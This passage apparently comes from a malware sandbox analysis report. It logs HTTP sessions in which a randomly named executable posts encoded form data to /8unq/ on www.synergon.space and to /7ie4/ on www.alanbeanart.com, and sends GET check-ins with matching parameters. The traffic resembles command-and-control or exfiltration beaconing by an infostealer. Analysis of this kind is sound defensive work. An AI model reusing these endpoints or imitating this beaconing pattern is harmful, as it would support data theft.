29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                      Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.954124109.95.158.127801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:40.908099890 CEST725OUTPOST /8unq/ HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.synergon.space
                                                      Referer: http://www.synergon.space/8unq/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 48 69 6b 66 56 64 2b 77 78 37 32 6b 38 4e 75 64 36 67 72 45 65 6c 51 57 68 6c 73 38 67 2b 47 46 5a 74 79 4d 49 67 43 77 42 4b 77 72 54 30 34 6c 34 43 78 59 6b 78 43 6f 76 31 50 67 58 56 77 2b 4e 41 62 45 4a 76 6d 4a 5a 38 75 6c 59 77 71 43 49 38 36 48 64 4c 31 35 78 48 52 4e 43 48 59 4b 52 31 54 6c 4c 42 43 2b 6b 79 67 4b 72 43 71 66 39 72 51 2b 6b 73 39 39 44 4e 30 77 44 43 5a 5a 2b 6c 4f 44 6a 4c 78 36 49 38 4e 2b 58 68 67 6f 43 58 32 78 4f 79 6b 34 71 35 2b 32 32 77 43 67 67 70 35 49 47 41 2b 6f 77 3d 3d
                                                      Data Ascii: dZo=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXHikfVd+wx72k8Nud6grEelQWhls8g+GFZtyMIgCwBKwrT04l4CxYkxCov1PgXVw+NAbEJvmJZ8ulYwqCI86HdL15xHRNCHYKR1TlLBC+kygKrCqf9rQ+ks99DN0wDCZZ+lODjLx6I8N+XhgoCX2xOyk4q5+22wCggp5IGA+ow==
                                                      Aug 18, 2024 18:25:41.578433990 CEST1043INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 810
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Sun, 18 Aug 2024 16:25:41 GMT
                                                      server: LiteSpeed
                                                      Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                      Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.954125109.95.158.127801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:43.450443029 CEST1738OUTPOST /8unq/ HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.synergon.space
                                                      Referer: http://www.synergon.space/8unq/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 42 36 6b 66 6a 52 2b 7a 58 7a 32 6a 38 4e 75 51 61 67 75 45 65 6c 64 57 6c 78 67 38 6c 6d 34 46 62 6c 79 4d 71 6f 43 32 7a 69 77 68 54 30 34 73 59 43 77 57 45 78 58 6f 76 6c 51 67 58 46 77 2b 4e 41 62 45 50 44 6d 64 63 49 75 6a 59 77 70 55 59 38 6d 52 64 4c 64 35 31 72 6e 4e 47 61 6c 4b 46 42 54 6b 71 78 43 34 41 53 67 46 72 43 6f 65 4e 72 79 2b 6b 68 6c 39 41 34 48 77 41 66 4d 5a 34 56 4f 42 58 4b 53 6f 71 6b 67 6a 58 39 4d 76 68 2f 75 31 4c 71 67 6d 34 67 43 76 44 67 43 2f 7a 63 36 4a 6a 70 72 31 42 78 6b 6f 64 68 49 51 32 48 69 2f 50 33 57 74 4f 50 41 39 30 39 73 62 64 31 58 73 70 6b 4d 53 6f 4f 6c 4c 56 61 36 2f 4d 4b 77 35 75 2f 74 32 74 43 4d 51 42 33 76 48 6c 42 44 6f 53 67 51 2f 78 30 74 56 52 70 59 4d 76 67 70 56 64 58 6f 48 38 37 33 36 52 67 6d 56 32 65 6e 54 6a 48 70 36 48 77 44 39 54 7a 57 59 6c 31 37 50 42 79 53 79 6e 50 44 68 50 54 75 6e 55 4c 5a 61 58 [TRUNCATED]
                                                      Data Ascii: dZo=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXB6kfjR+zXz2j8NuQaguEeldWlxg8lm4FblyMqoC2ziwhT04sYCwWExXovlQgXFw+NAbEPDmdcIujYwpUY8mRdLd51rnNGalKFBTkqxC4ASgFrCoeNry+khl9A4HwAfMZ4VOBXKSoqkgjX9Mvh/u1Lqgm4gCvDgC/zc6Jjpr1BxkodhIQ2Hi/P3WtOPA909sbd1XspkMSoOlLVa6/MKw5u/t2tCMQB3vHlBDoSgQ/x0tVRpYMvgpVdXoH8736RgmV2enTjHp6HwD9TzWYl17PBySynPDhPTunULZaX7uQ8/tSCS1au93s9udotGMNEX+0KMem/iSMik4qkx0QQak7pJ5Q0P/F6EqFuU436HH/72D9Ufg28re5NahAPRwm6wZP3gwnKTlw/uwhvDAFzGYZAwg7Ky4G1JxSNl5DHcaEOzUq/YmBChep2PbcA5/wRSO0OJdh7PlZXKRZv3Ng0e6dwfweT+pBfX2rM0TCx8yQUsh0LssRhfkpPgtFQ5eAvdYi+ZNElTu/l3U7gx1VbcljrTjfV7AXVCtniTQIhiVdZWcNd6Xfw8h6nFrO2m2a95HHywX40ha8KHZjUM0pqbHT7w4e53t8Suk627HDgu+OI+nGmyxphENt/fmp3ixsVAEnSkv70+kdK+jQhru+lds9kljKDLqR4H6AcQIpHzzLgp9XGZU5m5O2/FBWQrtkzeEdJXCwNL35Bnfcglej9JgToaHa2XgNe3voBrg3kIAioWv2nYpUo53ffSI7OHLrcKL5D4XR7X4nl2MVAP/sgs9msPjiSaG2SAACJHlm7jf8rQ1HpcfUQXryaDw8faHgNEXvsQIdOlAdsajS4RJjBznVK1qSaXQfIvJr4ms8IzmsBnXU6zSc0mjlQK+40rdhdc4HI+lNk7qRMvZrqH3MK35lT667HjpMC4K/t/QC4ANlPfmHY5n3ULHFsgHyD3T6j23XtES8ZTf [TRUNCATED]
                                                      Aug 18, 2024 18:25:44.121920109 CEST1043INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 810
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Sun, 18 Aug 2024 16:25:44 GMT
                                                      server: LiteSpeed
                                                      Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                      Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.954126109.95.158.127801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:45.996210098 CEST440OUTGET /8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:46.635668039 CEST1236INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 2247
                                                      date: Sun, 18 Aug 2024 16:25:46 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><meta name="Author" content="dhosting.pl" /><meta name="Copyright" content="dhosting.pl" /><meta name="Language" content="pl" /><meta name="Robots" content="index, follow" /><title>dhosting.pl - pod tym adresem nie znajduje si aden serwis WWW</title><style type="text/css">a:link, a:visited{font: 12px verdana, sans-serif;color:#333;text-decoration:none;}img{border:0px;}a:hover, a:active{color:#000;text-decoration:underline;}#tresc{font: 12px verdana, sans-serif;color: #333;}#foot{font: 10px verdana, sans-serif;color:#606060;text-align:center;position:absolute;bottom:5px;width:99%;}.f:link, .f:visited{font-size:10px;font-weight: bold;font-family: verdana, sans-ser [TRUNCATED]
                                                      Aug 18, 2024 18:25:46.635730982 CEST1200INData Raw: 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 66 3a 68 6f 76 65 72 2c 20 2e 66 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 32 30 32 30 32 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d
                                                      Data Ascii: n:none;}.f:hover, .f:active{color:#202020;text-decoration:underline;}</style></head><body><div style="text-align:center;"><a href="https://dhosting.pl" rel="nofollow"><img src="https://dhosting.pl/img/logo.svg" alt="dho


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.9541273.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:51.675002098 CEST704OUTPOST /7ie4/ HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.alanbeanart.com
                                                      Referer: http://www.alanbeanart.com/7ie4/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 6c 34 64 67 64 45 39 43 72 5a 64 30 4b 6f 6a 44 79 79 78 53 67 73 51 48 49 41 4c 6c 4c 5a 79 73 2b 78 6f 47 65 61 6b 4d 35 56 65 2b 75 50 59 64 51 54 67 4b 48 79 41 41 63 6a 71 69 43 4f 52 63 62 61 68 49 77 64 45 7a 30 4e 64 53 76 72 37 4f 36 4e 44 53 43 6f 54 58 6d 39 72 41 70 73 76 34 79 36 75 42 65 61 52 65 32 6a 77 7a 46 6f 78 67 6f 71 57 4a 6e 37 36 78 59 33 38 48 30 58 51 6a 68 5a 66 53 2f 71 6c 4a 42 53 4b 39 46 56 43 31 33 72 65 34 45 46 66 63 42 66 6d 63 6d 43 48 51 5a 6f 66 70 38 44 67 68 37 61 2b 4b 42 50 33
                                                      Data Ascii: dZo=QWuY90GonuIzDl4dgdE9CrZd0KojDyyxSgsQHIALlLZys+xoGeakM5Ve+uPYdQTgKHyAAcjqiCORcbahIwdEz0NdSvr7O6NDSCoTXm9rApsv4y6uBeaRe2jwzFoxgoqWJn76xY38H0XQjhZfS/qlJBSK9FVC13re4EFfcBfmcmCHQZofp8Dgh7a+KBP3


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.9541283.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:54.216761112 CEST728OUTPOST /7ie4/ HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.alanbeanart.com
                                                      Referer: http://www.alanbeanart.com/7ie4/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 39 79 74 63 5a 6f 48 62 75 6b 50 35 56 65 71 2b 4f 51 41 41 54 72 4b 48 2b 2b 41 65 6e 71 69 43 61 52 63 65 6d 68 4a 48 70 4c 7a 6b 4e 62 59 2f 72 35 41 61 4e 44 53 43 6f 54 58 6e 59 4f 41 71 63 76 34 48 79 75 48 2f 61 53 41 6d 6a 7a 30 46 6f 78 6b 6f 71 61 4a 6e 36 70 78 5a 62 61 48 32 76 51 6a 68 4a 66 56 74 53 6d 44 42 53 4d 69 56 55 75 30 46 2f 58 35 7a 64 67 55 79 72 30 4d 31 53 76 65 59 49 42 34 4f 4b 37 30 73 61 5a 4e 6d 47 66 44 69 42 2b 47 75 49 59 77 78 30 62 48 63 35 6b 34 65 72 59 2f 67 3d 3d
                                                      Data Ascii: dZo=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY9ytcZoHbukP5Veq+OQAATrKH++AenqiCaRcemhJHpLzkNbY/r5AaNDSCoTXnYOAqcv4HyuH/aSAmjz0FoxkoqaJn6pxZbaH2vQjhJfVtSmDBSMiVUu0F/X5zdgUyr0M1SveYIB4OK70saZNmGfDiB+GuIYwx0bHc5k4erY/g==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.9541293.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:56.946115971 CEST1741OUTPOST /7ie4/ HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.alanbeanart.com
                                                      Referer: http://www.alanbeanart.com/7ie4/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 31 79 73 76 68 6f 47 34 32 6b 4f 35 56 65 32 4f 4f 52 41 41 54 79 4b 45 4f 36 41 65 37 36 69 48 65 52 63 37 71 68 63 46 42 4c 34 6b 4e 62 57 76 72 38 4f 36 4e 57 53 44 45 58 58 6d 6f 4f 41 71 63 76 34 41 43 75 48 75 61 53 43 6d 6a 77 7a 46 6f 48 67 6f 72 50 4a 6e 69 35 78 5a 66 73 47 47 50 51 6a 46 56 66 51 59 2b 6d 65 52 53 4f 68 56 55 32 30 46 69 50 35 33 31 47 55 7a 66 53 4d 31 61 76 64 74 56 61 6f 76 2b 76 31 2f 66 78 50 31 71 61 44 69 4e 5a 50 64 31 2f 69 6a 45 75 54 76 55 57 36 50 4b 49 2f 67 4e 36 39 47 54 50 7a 69 6f 69 4c 34 70 4d 4a 65 74 72 72 6d 43 62 68 62 52 46 6d 32 6f 65 34 53 34 63 2b 31 73 34 5a 58 64 6d 52 4e 6e 4b 36 4a 4a 77 66 59 36 58 4a 77 7a 36 55 76 30 69 72 6c 32 74 6b 45 2b 56 4a 6a 65 43 64 31 73 35 50 46 76 59 6b 64 75 37 51 7a 4d 58 48 4b 44 51 33 6c 61 44 74 34 78 6d 71 73 62 63 6c 41 6b 52 6c 73 34 6c 2b 79 37 6b 6c 2b 4e 2b 58 56 [TRUNCATED]
                                                      Data Ascii: dZo=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY1ysvhoG42kO5Ve2OORAATyKEO6Ae76iHeRc7qhcFBL4kNbWvr8O6NWSDEXXmoOAqcv4ACuHuaSCmjwzFoHgorPJni5xZfsGGPQjFVfQY+meRSOhVU20FiP531GUzfSM1avdtVaov+v1/fxP1qaDiNZPd1/ijEuTvUW6PKI/gN69GTPzioiL4pMJetrrmCbhbRFm2oe4S4c+1s4ZXdmRNnK6JJwfY6XJwz6Uv0irl2tkE+VJjeCd1s5PFvYkdu7QzMXHKDQ3laDt4xmqsbclAkRls4l+y7kl+N+XVQpfIRqwV8IJfH17Pl6r/qd0DvUhFt4v+agdzYh+2ZxgpKNr8PyXMpAh6LVV15mai3eVQcFk+IKFEI5MjcNYjfJgBEBYJYvXlJp9zcPZwQLvHmdBlv9FImPtBvG0+vdQQh7w2mpqxUhbwBjw/FT9A9CwRBehqP2kcDTW3jftxV/ER51YkB6CHnbB2kHA61HvpnNf4reWmK9iwMIxHTDN5PcRXweg8DbLpWEssWEH/ANhnCWq9owRH6T4IbNRynHX1Xj1AxkeRV+SUDjJ9KbuSZMZAceJFPH9fui7IQlJgKe5oweKsS/UCZNh1gyz0LZ0uxnbVj5vTfNC6arudEyMSvyZCzxgUNATZqVehlf0+wg4we0dMTA6gsWgOV1Hv+gn9aPC4GohoD2qMukZg6/ObOQGhikpmg5suBbTXCV/dfo0Ahir0gk+j5QxQKlJ9krGw/3xSfwc1hJmaySlLyZ7k3IDN8/Hg0vqE1rujNHCzEXJNExA7ZBGu9e/IW5rN//f0snKz6TBCnH0Qtf/ynEgMUMoDFqjb+l49BBuTFUbao/0tc5jO61Jh0dQnGuFYtXB3Uq4UWY7/bqRlY222JhQOABsa+NHpTpnrhBChOgm2/UvIAHFIuv4XLrpJX4olhHyK+1Pee6pvz9off8U2V8669C5fsUoF+MZdEM [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.9541303.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:00.052233934 CEST441OUTGET /7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.alanbeanart.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:03.453802109 CEST394INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:26:03 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 5a 6f 3d 64 55 47 34 2b 44 44 64 70 2f 73 6a 44 6c 6f 55 70 63 31 50 61 39 6f 7a 33 72 63 70 63 43 4b 32 58 69 4d 69 4f 5a 6b 44 34 34 46 53 6a 4c 31 42 55 4a 43 30 42 37 5a 62 39 70 43 6d 65 43 66 56 58 6b 6d 41 46 76 50 50 6f 67 47 52 52 6f 69 76 4b 56 68 4c 6c 6e 52 38 57 2b 44 51 49 62 4e 6f 51 32 6b 6e 65 56 68 6e 4f 4a 67 30 35 44 37 30 63 67 3d 3d 26 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
